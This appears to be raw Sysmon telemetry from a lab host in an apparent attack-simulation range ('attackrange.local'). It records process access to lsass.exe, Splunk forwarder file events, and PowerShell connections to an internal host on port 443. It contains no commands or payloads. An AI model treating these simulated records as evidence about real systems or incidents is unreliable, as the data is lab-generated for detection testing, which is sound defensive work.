18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.258{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:45.940{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29390A4474E6FCBD66257930D9E0FD8B,SHA256=227E2D41CB2E2D47054E09F7A59BF3C58000E87CA3666A4C344C361E54052EA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:45.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94D282AB831A05AC72C55DD6FF24FC58,SHA256=8F6A583BD58758AE222CA83C8991134D3FCE50DC6C39D7A79DBAAE25BA7A033D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:46.971{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6C1AE2B8712A310C1641843C3170518,SHA256=4962E844AF67569403F8CF12DE446A1F61559E17838B9FA835451AC23FA51CBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:11.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56732-false10.0.1.12-8000- 23542300x800000000000000035085458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:47.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEF43E7C707E1944717209E6AFED2F3C,SHA256=B40075F25A7D612C219B6860F252E1D5B63B2B6DB7B5B2F16BA7D1D0A2CEA40F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:14.341{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56733-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:49.500{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0DFDD2C3CFCBCE6CAC73FF63B3E44013,SHA256=72F3757BDDCF0605AC12A5B1BA17D8D1F8E56B7B414FFE9DDD188FAF70AD1EE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:49.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2464AAA051FD563359AE030842FD8D3F,SHA256=EFD1428770CB410E884FEF9E4FF21A90E2ADCD1B4843ADB621CED6AFA385CA81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:50.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A4F65CBEB097934A4054F2D61F226B,SHA256=321E929CC4796696AC98366EC00F0CFDFB920462B23EDB808DBAA3BCF3DE760F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:16.155{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56734-false10.0.1.12-8000- 23542300x800000000000000035085463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:51.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1A4274067D4EF39DF34B9802D313F5,SHA256=ED81AF512B5F8274890920689CECC2637B6A608C0322CCF250838EDD16EA39EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:52.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51B76E86EE87E503C5AF4B072A54D174,SHA256=3B44664A90B761516B50AF98209CC962148C934754778AE71290A74413B68BCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:53.112{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369EB5CAE354B2172AFBD4E09AFA7C1C,SHA256=4B2D3C91AF22C3149F378479759C66B8E93BBCCD32BD927FF7EF9466084DD1D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.950{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:19.353{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56735-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=44A9C77F9C6CC21726FD6F85489AB187,SHA256=1B56F8EF279B88131EA9A6C680F2658A7EC2962F2CEAF2AEA4C9E8E8881477B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:54.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84098B62C49DE8F2B5E79E5EF07DFA44,SHA256=23D012D91FD9DEAE66909B4EE4AA2F337428278F34D5898AD0E846411E17A344,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:55.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E64FFC1C9C014F116A68B698471B66EE,SHA256=53EFEC43CE4D84BFAFF9508844F2C1A4679A4595189BD770363A2C8B2E48A917,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.205{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56737-false10.0.1.12-8000- 354300x800000000000000035085496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:20.952{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56736-false10.0.1.12-8089- 23542300x800000000000000035085495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.864{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\aborted-session-pingMD5=2434FD8154FD1E49932CCEC2D1C28A98,SHA256=9D5E1CDEE0586B5EC80C13590577C1A4E0C2D2C6875B97A3723E791F4FD79D73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0694582EFC541867CBEE70CB4A8359,SHA256=9656A92A8C0D02A6C0E85A86892EA86E2D1B0D170A5C1C94C55BFDAAE1088BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.111{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.111{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.111{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.096{B81B27B7-4013-611D-1600-00000000C801}11966680C:\Windows\system32\svchost.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.080{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.065{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.065{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F5C-613A-6690-03000000C801}908C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.049{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.049{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 